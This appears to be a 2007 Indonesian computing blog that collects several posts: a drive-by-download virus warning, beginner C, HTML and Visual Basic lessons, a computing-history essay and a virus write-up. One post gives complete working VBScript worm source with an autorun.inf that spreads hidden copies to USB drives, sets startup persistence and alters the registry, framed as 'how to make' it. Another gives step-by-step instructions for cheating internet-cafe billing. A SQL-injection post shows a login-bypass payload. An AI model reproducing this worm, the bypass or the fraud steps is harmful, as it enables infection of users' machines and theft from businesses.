Jumat, 21 Desember 2007

Drive by Download

Drive by Download 3 Desember 2007
Hati-hati ancaman virus kartu ucapan akhir tahun melalui drive by download !!

(Artikel Chip 11 – 2007 (November))

Benteng Maginot adalah suatu sistem pertahanan Perancis pada tahun 1940-an yang tersebar di sepanjang perbatasannya dengan Jerman dan Italia. Benteng ini memiliki kemampuan pertahanan yang sangat kuat dan dibangun berdasarkan pengalaman perang defensif Perang Dunia I. Tetapi sejarah membuktikan bahwa pada Perang Dunia II, pasukan Jerman tidak bodoh dengan menyerang Perancis melalui perbatasannya sehingga harus menghadapi benteng Maginot ini, tetapi malahan menyerang Perancis melalui Belgia dan Belanda menembus hutan Ardennes dan sampai di Utara Perancis dan akhirnya seperti kita ketahui Jerman berhasil menaklukkan Perancis.

Hal yang mirip terjadi pada pertempuran di dunia IT hari ini. Para administrator mailserver yang pada mulanya memperbolehkan lampiran apapun melewati server dan tiba di mail client pengguna email. Tetapi karena pembuat virus memanfaatkan lampiran email sebagai sarana untuk menyebarkan dirinya dan beberapa bahkan melakukan rekayasa sosial dengan memalsukan diri sebagai lampiran yang tidak berbahaya seperti .txt atau .jpg maka akhirnya para administrator mailserver juga melakukan blok pada lampiran-lampiran berbahaya dan hanya membolehkan beberapa lampiran lewat seperti .zip dan .rar. Tetapi menilik perkembangan terakhir dimana pembuat virus juga mulai menggunakan lampiran .zip dan .rar, bahkan perkembangan terakhir yang cukup mengejutkan dimana lampiran yang tidak berbahaya seperti .pdf pun menjadi lampiran yang berbahaya karena virus memanfaatkan celah keamanan pada Adobe Acrobat yang terbaru sehingga dapat menembus pertahanan OS dan melumpuhkan firewall Microsoft maka banyak administrator mengambil jalan pintas. BLOK semua lampiran. Walaupun secara tidak langsung hal ini menurunkan derajat dimana menerima email mirip dengan menerima SMS, tetapi hal ini dipercaya dapat memberikan keamanan bagi pengguna akhir yang memang menjadi incaran para pembuat virus guna menyebarkan dirinya. Apakah hal ini berhasil mengamankan penerima email 100 % dari serangan virus ? Ibarat Benteng Maginot, para pembuat virus pada mulanya tidak berdaya menghadapi bloking ini, tetapi ibarat tentara Jerman yang tidak bodoh untuk berhadapan langsung, para pembuat virus jugatidak kalah cerdik dan akhir-akhir ini berhasil menemukan cara untuk mengatasi pengamanan no attachment yang diterapkan oleh administrator mailserver yang radikal ini. Bagaimana caranya ? Jawabannya adalah “Drive by Download”.

Dalam papernya “The Ghost in The Browser”, team Google memberikan informasi yang sangat mengejutkan bahwa lebih dari 10 % website yang ada di internet mengandung malware yang ditujukan untuk menginfeksi pengunjung yang datang ke website tersebut. Dengan kata lain, setiap 10 website yang anda kunjungi ada 1 yang mengandung malware berbahaya yang siap menerkam saat anda mengunjungi website tersebut, sebagai contoh adalah website yang menawarkan konten pornografi dan website crack. Anda jangan lega dulu jika tidak suka dengan pornografi dan crack, karena website umum juga ternyata banyak yang mengandung malware dan penyebabnya adalah banner-banner pertukaran iklan pada website “lurus” tersebut ataupun website yang memang berhasil ditembus dan dikuasai oleh hacker jahat. Apakah hanya begitu saja ? Menunggu korban tidak berdosa datang ke website tentu tidak efektif dan harus ada umpannya. Bagaimana para pembuat virus menggiring korbannya untuk mengunjungi website ini sehingga menjadi korban Drive by Download ?

Jawabannya adalah perkembangan dari virus W32/Luder atau dikenal juga dengan nama W32/Drev. Jika virus Luder akan datang dengan lampiran “postcard.exe” pada email dan kemungkinan besar akan berhasil di blok oleh mailserver yang menolak lampiran, sudah lampiran, .exe lagi (ibarat manusia, dosanya bertumpuk tapi mau masuk surga, mana mungkin dikasih lewat :P). Namun virus yang baru ini tidak mengandung lampiran dan akan datang sebagai email biasa sehingga tentunya tidak ada yang bisa diblok oleh mailserver. (Lihat gambar 1)



Gambar 1, Email virus baru yang memanfaatkan fitur Drive by Download untuk menyebarkan dirinya

Tampilan Rekayasa Sosial yang canggih

Virus yang datang dalam lampiran postcard.exe sebenarnya merupakan varian baru dari Luder karena memiliki tampilan yang lebih canggih dan meyakinkan. Virus ini akan merekayasa dirinya seakan-akan anda mendapatkan kartu ucapan, sebagai contohnya adalah yang diterima Vaksincom “seakan-akan” ada kartu ucapan yang dikirimkan melalui Hallmark www.hallmark.com. Baik bagian pengirim “From” dipalsukan dari E-cards@hallmark.com dan tampilan body email juga sangat meyakinkan kecuali salah eja “recieved” yang harusnya “received” (yang dalam waktu singkat diperbaiki oleh pembuat virus pada varian berikutnya yang bahkan datang tanpa memanfaatkan tampilan logo macam-macam dan hanya plain text saja, dengan memalsukan email dari greetings.com, domain yang juga dimiliki oleh Hallmark). Selain itu, perbedaan utama adalah link untuk melihat kartu ucapan “To see it, click here” yang dipalsukan. Link tersebut tidak terlihat, kecuali di klik atau di lihat propertynya. Disini terlihat bahwa link tersebut mengarahkan download pada IP lain http://195.199.145.57 diluar hallmark dan jika link ini di klik, maka akan memicu download file dengan nama “postcard.exe” (lihat gambar 2).

Gambar 2, Link download kartu ucapan yang memicu download virus dengan nama file “postcard.exe”.
Guna memastikan bahwa Postcard.exe adalah virus, maka penulis melakukan scan dengan Norman Virus Control dan hasilnya adalah Norman Virus Control dengan teknologi Sandboxnya mampu mendeteksi file tersebut sebagai virus W32/Hidewindows.C.dropper. (lihat gambar 3)

Gambar 3, Norman mendeteksi file “postcard.exe” sebagai virus dengan nama W32/Hidewindows.C.dropper.

Dari penelusuran di atas, pembaca tentunya dapat mengambil kesimpulan bahwa para pembuat virus sekarang tidak kalah pintar dengan tentara Jerman yang dulu menyerang Perancis di tahun 1940. Daripada berhadapan langsung dengan pertahanan benteng Maginot yang sudah siap menghadapi serangan, Jerman memilih menyerang Perancis dari Belgia dan Belanda yang tidak memiliki benteng Maginot. Daripada repot-repot memikirkan cara menghadapi bloking lampiran oleh administrator mailserver sehingga efektivitas penyebaran virusnya menurun maka pembuat virus memilih untuk tidak mengirimkan virus melalui lampiran email, tetapi memanfaatkan email untuk mengarahkan penerimanya mendownload / menjalankan file virus dari browser (Drive by Download).

Virus ini perlu diwaspadai, dan terbukti pada Lebaran 2007 virus ini berusaha memanfaatkan event tersebut dengan mengirimkan dirinya seakan-akan kartu ucapan lebaran. Apalagi akhir tahun dimana pengiriman kartu ucapan mencapai tingkat tertinggi, maka virus ini akan mendapatkan momentum yang terbaik di bulan Desember 2007.



Salam,

Aa Tan

info@vaksin.com

PT. Vaksincom

Jl. Tanah Abang III / 19E

Jakarta 10160



Ph : 021 345 6850

Fx : 021 345 6851

Sabtu punya

Mencurangi (hampir) Semua Jenis Billing Warnet
Oleh BLiZBS Uchiha
Published: Januari 10, 2007
Print
Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga.

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).


Thanx to: ~ Allah swt ~ #yogyafree ~ #jasakom ~ #antihackerlink ~ W1ga5 ~ Blue Spy ~ And all X-Code crew ~


Contact me:
Yahoo ID : blizbs_3690
Frendzta' : www.friendster.com/blizbs3690

Kamis punya

Membuat dan Menghapus Virus Autorun tanpa Antivirus
Oleh 7up3r1
Published: Desember 12, 2007
Print
Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw.

Adapun cara membuat virus autorun sebagai berikut

1. script coding pertama

[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs

simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)

2. script coding kedua
'Kalong-X2
'Varian dari Kalong.VBS
on error resume next

'Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd

'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39

'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes = 39

set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next

'Manipulasi Registry
set kalong = createobject("WScript.Shell")

'Ubah IE Title
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"

'Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

'Buat pesan saat Windows Startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"
kalong.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"

'Aktifkan saat Windows Startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"

'Ubah Default Start Page Internet Explorer
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com"

'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)

secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.

Adapun cara menanggulangi virus tersebut yaitu dengan cara

- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK

- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut

- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)

- setelah itu, file tersebut dihapus/di delete dari komputer

semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.

Thank’s

7up3r1@gmail.com

LESSON I

PEMROGRAMAN BERBASIS C
Dibuat ileh : Jack
bahasa : C (lebih fokusnya pada C++)
Program : Bisa menggunakan visual C++, borland C++, ataw yang menurut saya paling baik, Dev C++ (fiturnya termasuk lengkap, dan open source)
Download : http://ftp1.sourceforge.net/dev-cpp/devcpp4.zip <-- Dev C versi 4
Link resource : http://www.bloodshed.net/dev/

Sebelum masuk ke dalam lebih lanjut, gwa bakal mulai dengan pengenalan program C. Program C memiliki suatu ketentuan (kerangka) yang sudah ditetapkan dari awal. Kerangka itu berfungsi untuk memudahkan kita "membaca" dan mengerti program tersebut.
#include
int main()
{ printf("Hallo HPS mania\n");
system("pause");
return 0;
}
#include bagian kepala dari program, maksud dari tulisan diatas ialah program yang kita gunakan menggunakan resource stdio (stdio merupakan standar format dalam C, berupa perintah-perintah yang biasa dipakai dalam C seperti printf, scanf, dll)
int main()
{ printf("Hallo HPS mania\n");
system("pause");
return 0;
}Bagian dalam/tubuh program, yang apabila kita bedah lagi sebagai berikut
int main()
{
}Kerangka tubuh program, semua perintah pada program kita masukkan disini, untuk lebih lanjut terdapat fungsi dan prosedur yang berguna untuk menyendirikan suatu aktivitas yang dikerjakan program tersebut.
printf("Hallo HPS mania\n");
Perintah standar pada C, printf digunakan untuk menampilkan tulisan pada layar. Tulisan yang ditampilkan yaitu Hallo HPS mania. Fungsi "/n" memiliki maksud enter, atau turun satu baris.
system("pause");
return 0;return 0; <--- perintah mengakhiri program, tetapi apabila kita hanya mengunakan return 0; saja, program akan langsung terbuka dan terhenti (windowsnya keluar sendiri). Sehingga kita memerlukan perintah system("pause"); agar kita dapat membaca isi dari program tersebut.
Note : Setelah kita membuat sebuah baris program, kita harus meng-compile program tersebut sehingga berbentuk executable program (.exe). Caranya ialah pilih menu Execute, lalu pilih compile. Atau dengan shortcut key F9

o,ya saya menyarankan kalau pembaca memakai dev C. Saya sendiri adalah seorang programmer yang biasa mengunakan C ++

Kamis, 20 Desember 2007

HTML & WEB

HTML & WEB
Dibuat Oleh : Temennya Alex yang situsnya sering dibobol( Ani )

Tak kenal maka tak sayang, maka saya memperkenalkan diri terlebih dahulu nama saya ani semester 3 disalah satu perguruan tinggi di jakarta, pekerjaan saya seorang pembuat web . Sebelum saya melanjutkan saya ingin bertanya apakah anda ingin menjadi seorang programmer HTML ? Jika ya silakan anda membaca tulisan ini lebih lanjut, bagi yang sekedar ingin tahu lanjutkan membacanya. Kalau anda memang mau menjadi programer HTML berarti anda harus berhadapan dengan HTML. HTML adalah Hypertext Markup Language. Kenapa saya sendiri suka kepada HTML adalah salah satu bahasa yang lebih sederhana dibandingkan bahasa pemrograman komputer lainnya, seperti C atau visual basic. Belajar HTML sangatlah menyenangkan.Anda melalui bab ini akan diajarkan membuat halaman web yang paling dasar. Pembuatan halaman web ini dimulai dengan yang paling dasar dengan mengunakan sebuah editor yang namanya notepad.Beberapa hal yang perlu diingaty adalah setiap penulisan HTML dimulai dan diakhir sebagai contoh lihatlah gambar dibawah ini

lalu savelah dengan nama 1.html.Maka ketika kita mengklik dua kali maka kita akan melihat halaman web dengan tulisan rose are red bla....,bla.....Jika kita ingin tulisan kita menjadi tebal tambahkan huruf b dapat dilihat contoh dibawah ini

semua yang kita pelajari hari semua termasuk kedalam Tag pembuka dan tag penutup minggu depan kita akan mempelajari Tag perintah pemformatan

Sql Injection

SQL INJECTION
Oleh : Vbbego
Disadur dari:
Seni Internet Hacking
Teknik Hacking untuk Pemula
Hack

Mungkin kita sering menonton film anak-anak, terutama donal bebek, tapi pernahkah kita perhatikan bahwa Donal sering melakukan Sql injection. Coba perhatikan cerita ini Donal melihat sebuah pengumuan yang ditempel,”Dilarang masuk” diruangan paman Gober. Apa yang dilakukan Donal ? Donal menambahkan kata “Kecuali Donal” pada pengumuman tersebut,sehingga ia bisa masuk dan meminjam uang pada paman Gober. Dalam cerita diatas penambahan kata “kecuali Donal” adalah salah satu contoh Sql Injection.Tetapi sebelum kita membahas Sql Injection kita wajib mengetahui apa yang dimaksud dengan Sql.Sql adalah suatu bahasa yang digunakan untuk mendapatkan atau merubah data yang ada didalam relational database, Salah satu contoh statement sql sederhana yang akan mengambil record nama dari table murid adalah sebagai berikut select nama from murid. Bagaimana caranya kita bisa login tanpa mengetahui username dan password. Saya akan memberi contoh kepada anda serta tentu saja teknik manipulasinya sehingga anda bisa melewati proses login tanpa perlu mengetahui username dan password. Hal yang umum dipakai orang untuk mencocokan user yang login, maka digunakan statement sql sebagai berikut : select * from tbl_user where field_username=input_username and field_password=input_password, jadi ketika kita login terjadi pengecekan apakah user dan password saya benar atau tidak, jika memang terdapat record dengan username nama saya dan password sama dengan password saya maka otomatis sql akan mengembalikan satu record yang berarti kita bisa masuk sebaliknya jika salah kita dianggap gagal. Lalu bagaimana kalau kita merubah isian pada username dengan 'or”=' pada kolom user name dan 'or”=' pada kolom password maka yang dilakukan sql adalah sebagai berikut Operasi logika or yang dimasukan telah menyebabkan perintah sql akan selalu menghasilkan nilai True(Benar). Program telah mengijinkan kita masuk dan dianggap sebagai user yang sah. Lalu sebagai siapa kita? Kita akan menjadi user yang paling atas dari data tersebut biasanya sih administrator.Sangat mudah bukan, oleh karena itu saya hanya ingin mengingatkan bagi pembuat program tolong dibatasi input masuk user atau password kalau bisa jangan dibiarkan user memakai karakter yang special seperti % dan lain-lain. Jangan lewatkan selasa depan yah saya akan mengajarkan bagaimana kita menjadi orang lain.

Minggu, 16 Desember 2007

Visual Basic

Visual Basic
Senin, 17 Desember 2007
Oleh :Z

Kenapa saya membantu temen saya yang mempunyai nick vbbego, karena saya ingin berterima kasih kepada beliau yang menjelaskan visual basic dengan bahasa yang sangat sederhana dan mudah dimengerti. Mungkin lebih baik saya memulai dari awal saya belajar visual basic. Pertama kali saya minta diajarkan visual basic saya mendapatkan pengalaman yang tidak enak. Saya bertanya apa sih visual basic itu ? Saya engga pernah mendapatkan jawabnya banyak yang bilang visual basic adalah bla..bla..bla.... Hingga saya tertarik dengan sebuah nick vbbego. Lalu saya bertanya hal yang sama. Jawaban vbbego percuma saya bicara panjang lebar tentang visual basic bagaimana kalau langsung dipraktekan saja. Modal pertama kamu harus menginstall terlebih dahulu Visual Basic. Mendapatkan jawaban yang unik maka saya pun mencoba menginstall Visual Basic, alhasil saat ini saya bekerja sebagai programmer di salah satu perusahaan yang sedang berkembang yang ingin meninggalkan program under dos ke visual.Artikel saya ini hanya ulangan apa yang pernah diajar vbbego kepada saya ,semoga bisa berguna bagi temen-temen semua. Saya harap kalian sudah menginstall visual basicnya yah. Pertama kali kita membuka program Visual basic maka akan tampil gambar seperti dibawah ini

ToolBox disini kita dapat mengambil tools apa saja yang kita gunakan dan ditaruh di Form, Jadi form yang pengertiannya untuk saat ini adalah tempat untk menaruh kontrol-kontrol yang dalam visual basic, tool properti yang digunakan untuk mengacak-ngacak kontrol yang disediakan Visual basic.explor vb sebabnya kata vbbego disinilah kita dapat melihat apa yang kita telah buat.Mulai bingung yah dari pada makin bingung kita mulai saja coba-cobanya, supaya seragam coba deh tiru form dibawah ini :

O ya supaya sama dengan gambar ketika buat label, captionnya diganti jadi Nilai A, pas command buttonnya juga sama, kalau sudah klik dua kali command buttonnya sehingga isinya seperti ini
Private Sub Command1_Click()
Text1.Text = Val(Text1.Text) + Val(Text2.Text)
End Sub
Private artinya blok,_clik dilakukan pas tombol diklik
text1 diisi jumlah dari text1 ditambah text2
blok selesai.
Setelah semua itu selesai, saya bertanya sama vbbego jadi vb adalah aplikasi yang bisa membuat apa yang manusia mau dengan bantuan form dan tool box yang isinya bisa diacak-acak oleh properti yah, Vbbego menjawab sekarang anda menerangkan seperti orang mahir vb


Kamis, 13 Desember 2007

Teknologi Maju Kembali Ke Teknologi Purbakala

Teknologi Maju Kembali Ke Teknologi Purbakala
Oleh S'to
Published: September 21, 2007
Print

Saya pernah melihat sebuah lelucon, ceritanya waktu itu adalah masa depan dengan semua teknologi yang serba modern. Seorang perempuan mengunjungi museum yang melihat perkembangan mode dari jaman ke jaman. Pertama kali dia melihat seorang manusia dengan jenis pakaian ala kadarnya dan hanya menutupi bagian tubuh yang penting dengan sangat minim, kemudian perkembangan selanjutnya pakaian mulai dikenal dengan pakaian lengkap, rok mini, dan seterusnya sampai mode terakhir adalah manusia dengan pakaian minim seperti dulu kala. Ini mungkin hanya lelucon atau sekedar sindiran bahwa kita tidak menyadari apa yang sebenarnya kita mau sampai kita kembali lagi ke asal.

Teknologi bisa juga terjadi seperti halnya mode pakaian berkembang dari jaman ke jaman toh akhirnya kembali lagi ke asal. Di era awal perkembangan komputer digunakan mini dan mainframe dimana semua pemrosesan adalah terpusat. Pada client hanyalah berupa monitor dan keyboard atau terminal yang tidak mempunyai alat pemrosesan apapun. Semua perintah dikirim dan di proses secara terpusat sehingga komputer pusat haruslah merupakan sebuah komputer yang cukup canggih dan cepat untuk melayani client yang terhubung.

Perkembangan selanjutnya, yang membuat perubahan yang sangat radikal adalah dikenalkannya personal komputer atau PC. Dengan munculnya PC dikenallah apa yang dinamakan sebagai smart client yaitu komputer yang mempunyai prosesor dan berbagai jenis aksesorisnya. Perkembangan PC inipun berkembang terus dan mendapatkan dukungan luas dari para pembuat PC dimana akhirnya kita mengenal konsep two tier, three tier dll dimana beban aplikasi dibagi ke dalam lapisan-lapisan sehingga tidak terbeban pada satu komputer.

Perkembangan PC akhirnya semakin berkembang demikian juga dengan software pendukungnya dimana semakin hari semakin banyak variasi yang ada. Akhirnya kesulitanpun mulai muncul, seiring dengan perkembangan PC yang sedemikian cepatnya sehingga tidaklah mengherankan jika dalam satu kantor terdapat 200 PC bertebaran dimana-mana. Angka 200 tidaklah besar dan menjadi ukuran yang lumrah di kantor-kantor.

Teknologi baru ternyata juga banyak menimbulkan masalah-masalah baru yang mulai tidak terpecahkan. Standarisasi software misalnya, dimana satu komputer menggunakan office 2000 sedangkan komputer yang lain menggunakan office xp sehingga menimbulkan masalah kompabilitas aplikasi. Demikian juga halnya ketika ingin melakukan standarisasi software atau melakukan update, upgrade dll ke dua ratus komputer bukanlah pekerjaan yang mudah. Belum lagi pengguna yang complain sehingga membutuhkan support dari bagian IT yang cukup tinggi. Selain itu, pekerjaan mengupgrade hardware PC, mengganti PC lama ke PC baru semakin banyak terjadi sehingga menimbulkan biaya tinggi.

Masalah-masalah seperti ini tidak pernah ditemukan ketika menggunakan mini dan mainframe yang terpusat. Akhirnya perkembangan selanjutnya pelan-pelan kembali lagi ke teknologi lama yang terpusat. Citrix yang mengenalkan software terpusat mendapatkan respon yang sangat baik ketika diperkenalkan dimana PC akan menjadi dump terminal yang akan mengambil tampilan, aplikasi dll pada komputer server. Tentu saja server yang digunakan haruslah mempunyai hardware yang cukup besar untuk melayani jumlah pengguna seperti halnya mini dan mainframe.
Selain Citrix, kita juga mengenal Terminal Services dengan prinsip kerja yang sama. Komputerisasi terpusat semacam ini sudah digabungkan ke dalam sistem operasi Windows Server seperti Windows Server 2000 dan Windows Server 2003 serta tentu saja Windows Server 2008. Jadi apakah ini termasuk teknologi baru ataukah teknologi lama dengan gaya baru ?

How We Teach You

How We Teach You atau Bagaimana kita mengajar ? Ini yang menjadi perdebatan yang panjang. Karena kita tidak pernah tahu apakah pembaca seorang programer atau seorang user biasa yang belom mengerti programing, maka kami memutuskan untuk menjalankannya dengan teknik dasar yang dikombinasikan dengan aplikasi yang berguna dalam kehidupan nyata. Dan yang perlu diingat kita akan menjelaskan apa adanya apabila dalam aplikasi itu ada virusnya yah kita kasih tahu. Well Team kami mengucapkan selamat belajar di dunia Blog. Ini pertama kalinya ada blog yang mengajarkan Ilmu komputer. Sepengetahuan saya sih belom ada blog yang dipakai untuk mengajar.Hiduplah Ilmu pengetahuan dan teknologi Indonesia, kelak temen-temen bisa menjadi kami yang kedua. Karena kita team setiap orang akan menuliskan namanya diakhir artikel yang dia tulis. Well rasanya itu saya.

Bingung

Setelah diputuskan akan mengajar programing dan web ternyata banyak masalah.Diantaranya bagaimana kita mengetahui kalau anda mengerti, Pembaca yang macam apa yang mau diajarkan, apa imbas baliknya bagi kita ? belom lagi blog belum bisa digunakan untuk menulis code HTML. Stres nih apa kemarin kita diskusi hanya dengan otot yah, sehingga sudah diputuskan masih banyak saja masalah yang mesti kita hadapi. Lalu apakah itu tanda blog ini akan berakhir ? Tentu saja tidak,lalu bagaimana kita menjawab tantangan ini.Anda bisa melihatnya dari hari senin dan tidak lupa dengan gaya yang santai dan berusaha tidak mirip dengan buku. Tokoh-tokoh yang pernah saya angkat akan membantu menulis dalam blog ini. Toni teman saya itu akan menulis tentang sekuriti 1 dan 2,saya akan menulis programan non visual, Mahasiswi semester 3 yang situsnya sering dibobol akan mengajarkan HTMl.Blog ini juga akan menampilkan artikel yang ditulis orang lain seperti contoh bonus minggu ini, jangan takut setiap artikel yang masuk akan ditampilkan apa adanya tidak memakai editing nama penulis ditulis dibawah. Jika teman-teman yang mempunyai informasi tentang Komputer dapat mengirim email ke saya di willy@bundamulia.ac.id.Untuk sub yang tidak disebutkan akan digarap bersama teman-teman saya yang lain.

Bonus Minggu Ini

ALMAN, Virus Yang Doyan Makan File EXE
Oleh eL!t!zT
Published: Desember 12, 2007
Print

Teknik pertahanan virus dengan membuat file induk berekstensi exe, com, ataupun scr di drive system saat ini sudah mulai kehilangan popularitas alias sudah ketinggalan zaman. Pasalnya, trik yang banyak digunakan oleh virus-virus lokal ini sudah sedemikian lumrah, mudah dikenali dan dijinakkan. Cukup dengan memakai windows task manager saja atau pake tools lain semisal ProcessExplorer, System Task Manager, ProcLister, IceSwords dan semacamnya kita dapat dengan mudah mengenali file induk yang dibuat oleh virus lalu mematikan proses atau bahkan menghapus filenya sekalian. Sebutlah sederetan virus lokal seperti brontok, kangen, decoil, Mr. CoolFace, Wayang, Blue Fantasy, dan Moon Light ternyata masih mengusung teknik seperti itu.

Selangkah lebih maju, kspoold bersaudara muncul mengusung teknik yang lebih cerdas dengan cara membuat file avmeter32.dll atau avwav32.dll di direktori system yang akan menginjeksi file explorer.exe. Namun demikian, kehadiran kspoold di komputer kita dengan segera dapat disadari selain karena aksinya merubah file doc dan xls menjadi exe di flash disk (varian barunya katanya merubah seluruh file doc di komputer menjadi bmp) juga karena virus ini masih menulis sebuah file bernama kspoold.exe di direktori system yang dapat dilihat melalui task manager.

Sekitar 1 bulan kemarin saya menemukan sebuah virus baru (mungkin juga ini virus lama, tetapi saya baru menemukannya) yang saya juga tidak tahu apakah virus tersebut made in Indonesia atau bukan, tetapi yang jelasnya virus ini hadir dengan teknik penyamaran yang lebih baik lagi.

